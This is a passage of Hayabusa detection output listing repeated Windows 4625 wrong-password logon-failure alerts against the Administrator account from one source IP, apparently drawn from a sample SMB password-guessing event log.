NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bNR5dXXnx0LeyNmW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ApUMxqDiqDNo6hrF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o3d1caGukhhBHp6s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oxDVCaWpkSECRoml : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: coqijUGaaVJXY4GV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ATPa6qMbfQ9QDrW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mnQEE00r01jhCNzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ir9sY7kG6vbOad4z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: REuk1RZ5eRs3pSbT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 91gfIcAUvKrSAENh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MtrVV1ux0v5w5XWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rFpyAqPQP77Ls6ir : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvwp4DimL7SgBmb0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1lnJZDjghQNQxfG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pBN1g8NBIj6WMrhz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cJMUobtFTwOQTgqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGZeGqe9rC172BVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zNP99dMvvDQl8WVw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qcwp0odjR0LfM11y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6VjaFCzZr8iUUovn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C3YniJHC0Cswfti0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 63lZpExTzSzNR96C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fKI61MTXJ5x9WF56 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhWYNEPWgh03cQSJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pvZg2LTYtsUhvBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BENGUFtNxdPjaS03 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fY1s0OG9JR38H6rm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LblLG1Il6ngkuAOo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PAZ83Onp00vURKSz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxvywmA4UMI04zm2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1vH6DSer71gxEDRc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uDNQibannB453BKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 02qkYtCIrOj38agd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atDwGfxC4RLYYDAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fCTUmKwLxkKCoCTn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBE7Y8yJMNSkJlaK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N7VGVfH05BC7bgaZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lP7kC2ayRIEeL5sw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cQOn41cB2t0ZkSP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.398 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PpOyXZwlcCw63tWP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7R8yD7A0lCU16Z0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frasd7f8On0O7B6k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.529 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtOqqV6rkCIZPPFG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lnwn4dc1lKABRKxH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiUnLFzfXR6rER9B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u1InESrL0ebaRw2z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlLAG8gXt9YNeW4H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uZIWubLvZcDOWHxr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZazp7ZnBrtswAse : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqK5Vqf0QF4qtg0A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k3JvFwi9gDNbO6Sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fBubAOTZMsahNG0Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:52.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KCxrXG3N1IRzDxxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e2h9M7o0lS7oC00a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pprfGGVZblL64xC3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wxgzMKd7eDwzs8WO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q2RljqAhn0NZhR6O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcxQVtjMqnE1wGfr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fSRggYsSiJGsGSyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQqfSKOyKLSILPrQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7oAI2q6YCu8btlK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KniVwndqE9aC6cIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FgQbvpfuS11matJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R9TwJS4B9ZaDD2Ze : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPUuoopOnwlTjlTP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9VEyOUuiOi8Q3JBJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGGGazMTBBfrppDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NKO4V35Y2qPEB59W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WxVdhpR7ZnAluurU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZjAZb9bQKZjwL8u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aKyLX5ChpgBuFEbr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49t2xJvH2yHcyHle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sg9Z6Pyix2UkMolr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0NN2olYn97ZoYCja : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S98j54bDGsz0k6g9 : IP Address: 192.168.198.149 : AuthPackage: 